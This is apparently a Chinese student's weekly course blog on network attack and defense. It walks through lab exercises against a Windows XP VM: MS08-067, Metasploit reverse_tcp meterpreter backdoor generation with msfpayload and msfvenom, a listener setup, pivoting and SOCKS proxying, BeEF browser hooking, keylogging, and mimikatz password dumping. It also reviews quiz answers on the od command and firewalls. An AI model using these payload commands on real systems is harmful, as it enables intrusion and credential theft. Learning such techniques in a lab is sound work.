20169212 2016-2017-2 《网络攻防实践》第七周学习总结

20169212 2016-2017-2 《网络攻防实践》第七周学习总结

教材学习内容总结

本周学习了第七章内容,主要为Windows操作系统安全攻防。学习了操作系统的基本框架、基本结构,操作系统的安全体系结构与机制(身份认证机制、授权与访问控制机制、安全审计机制、其它机制)及远程安全攻防技术。远程安全攻防主要包括:系统的安全漏洞生命周期、远程口令猜测与破解、远程渗透攻击、本地安全攻防技术(本地提权、敏感信息窃取、远程控制及后门程序)。

教材学习中的问题和解决过程

MS08-067漏洞全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,可在中国国家信息安全漏洞库当中找到——CVE-2008-4250,也可在CVE官网找到相关信息。如果用户在受影响的系统上收到特制的 RPC(远程过程调用)请求,则该漏洞可能允许远程执行代码。Kali为攻击机(IP 192.168.8.115),Windows xp为靶机(IP 192.168.8.112)。
利用漏洞获取shell过程如下:




视频学习总结

漏洞检索与利用

漏洞利用工具集
1.Exploit Database->searchsploit

2.pattern create
测试漏洞
armitage
结合MSF进行利用
3.jboss-autopwn-linux/win
专门针对Jboss的漏洞利用工具
4.ikat
自动化开启,等待目标访问中招。
5.termineter
评估智能电表的安全性。

Metasploit基础

1.启动介绍
Kali漏洞工具集中的重要组成工具,使用时首先要开启两个服务PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。
service postgresql start 无法启动,没有软件
service metasploit start
配置随系统启动
update-rc.d postgresql enable
update-rc.d metasploit enable
2.路径介绍
msf的路径cd /usr/share/metasploit-framework/
msfencode -l 未找到命令

3.基本命令
msfpayload:用来生成payload或者shellcode
搜索时候可以用msfpayload -l |grep “windows”这样的命令来查询
-o选项可以列出payload所需的参数
msfencode:msf中的编码器,早期为了编码绕过AV现在常用msfpayload与它编码避免exploit的坏字符串。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。
msfconsole:
开启metasploit的console
4.测试示例:发现漏洞,搜索exploit

Metterpreter

Metasploit中的很重要的模块,Metasploit框架中的一个拓展模块,作为溢出成功后的攻击载荷使用。
常用的命令:
background 将当前会话放置后台
load/use 加载模块
interact 切换进一个信道
migrate 迁移进程
run 执行一个已有的模块
resource 执行一个已有的rc脚本,可以自定义
生成meterpreter后门:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.125 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
设置参数

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333

设置成功后仍然无法使用,显示

Metasploit后渗透测试

1.查看跳板机的网卡
ifconfig
2.添加路由表
run autoroute -s 10.0.0.1
3.开socks代理

background 把session置于后台
search socks  使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit

4.通过background和sessions -i可以自由切换进入session
5.输入run可以看到在meterpreter上可以做的很多命令
6.通过run post/可以看到后渗透测试的模块
7.扫描内网信息
run arp_scanner -r 目标IP地址
内网端口转发
upload lcx.exe c: 上传到C盘根目录

BeeF

对XSS漏洞的利用,BeeF是浏览器攻击框架的简称,专注于浏览器端的渗透工具。
1.命令行下启动BeeF
直接使用命令 beef-xss即可,打开浏览器,会自动跳转至beef登录页面:

使用默认用户名beef和密码beef即可进入主界面:

2.假设被测试主机由于XSS漏洞请求到
测试利用:输入网址 http://127.0.0.1:3000/demod/basic.html,可以进入一个测试页面

这样在主界面左端就可以看到一个在线主机:

3.HOOK持续的时间为关闭测试页面为止,在此期间相当于被控制了,可以发送攻击命令,在Commands模块我们可以完成很多任务。有四种颜色表示,颜色不同代表攻击模块是否可用及隐蔽性强度。
4.选取MISC测试:


5.Proxy功能
借助目标浏览器访问目标可以访问的地址。
利用use as Proxy设定主机代理,在Rider选项中的Forge Request当中编辑要发送的内容

信息发送后,可通过History选项看到,待传输成功后,点击相应的信息,即可显示详细的传输过程:

6.BeeF与Metasploit结合加载
修改文件config.yaml




打开一个msfconsole


可以看到Metasploit下面多了很多可以使用的模块。

视频学习中的问题和解决过程

问题1.Metasploit工具的使用中遇到问题

在使用Metasploit工具之前需要打开 postgresql数据库服务和 metasploit 服务,但是出现了无法启动的错误。因为这个版本已经没有metasploit服务了,需要利用以下方法打开带数据库支持的MSF服务:

etc/init.d/postgresql start 或者 service postgresql start  //启动postgresql数据库
msfdb init         //初始化MSF数据库
msfconsole
db_status          //在msf中可以查看数据库连接状态

下面就以SSH用户名枚举攻击对metasploit工具进行测试,首先靶机的IP地址是 192.168.8.125,然后通过之前学过的 nmap 对靶机所开放的端口服务版本进行探测

接着就在已打开的msf中使用命令 search ssh,找寻msf所提供的关于ssh服务的工具:

这里选择上图标记出的工具,进行ssh用户名枚举,接着利用命令 use使用该工具:

设置密码文档:

设置对应参数:

使用exploit攻击:

攻击成功。

问题2.Meterpreter工具的使用出现问题

发现在终端中输入msfpayload时,出现错误“bash: msfpayload: command not found”。网上找了一下,原来是从2015年6月8日之后,msfpayload已经被移除了。以后只要使用msfvenom就行了,它集成了msfpayload和msfencode的功能

所以生成命令为:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.37.130 LPORT=2333 -i 5 -f exe > /root/door.exe

生成成功,将其移入XP系统中。
在kali的msf中执行exploit开始监听:

当XP系统运行后门程序可以看到:

然后开启键盘监听:

使用 load mimikatz 进行目标机密码明文的抓取:


上周考试错题总结

1.下面哪些Linux命令可以ASCII码和16进制单字节方法输出Hello.java的内容(BC)
A.od -b -tx1 Hello.java
B.od -tcx1 Hello.java
C.od -tc -tx1 Hello.java
D.od -tbx1 Hello.java
总结:od命令,用户通常使用od命令查看特殊格式的文件内容。通过指定该命令的不同选项可以以十进制、八进制、十六进制和ASCII码来显示文件。
语法:od [选项] 文件…命令中各选项的含义:

  • A 指定地址基数,包括:
    d 十进制
    o 八进制(系统默认值)
    x 十六进制
    n 不打印位移值
  • t 指定数据的显示格式,主要的参数有:
    c ASCII字符或反斜杠序列
    d 有符号十进制数
    f 浮点数
    o 八进制(系统默认值为02)
    u 无符号十进制数
    x 十六进制数

2.根据工作的网络协议层次,防火墙技术中工作网络层的是(AB)
A.包过滤
B.电路级网关
C.应用层代理
D.基于状态检测的包过滤
总结:电路级网关在传输层,应用层代理在应用层,基于状态的包过滤涉及到传输层。

学习进度条

学习目标(本学期)

完成网络攻防书本及视频的学习,完成各种攻防实践作业。

第二周进度

学习教材《网络攻防技术与实践》第一章和第二章;学习kali视频5个;查找了解了两个网络安全工具;查找两个黑客资料。

第三周进度

学习视频6-10;学习课本第三章;完成第三章课后作业。

第四周进度

网络嗅探的理论与工具;网络协议分析的理论与工具。

第五周进度

学习视频5个;学习教材最后一部分。

第六周进度

学习视频5个(21-25);学习教材第五、六章。

第七周进度

学习视频5个(26-30);学习教材第七章。

上周目标完成情况

完成

改进情况

注重实践学习,注意解决问题。

感想体会

本周的实验做成功后感觉很开心,获得了很多知识。扫描后得到漏洞,利用漏洞进行攻击获取权限,很感兴趣。

本周学习计划

课本七章学习:5小时
kali视频16-20:7小时
教材实践:2小时
整理写博客:2小时

参考资料

网络攻防技术与实践

原文地址:https://www.cnblogs.com/Jarvan210/p/6699229.html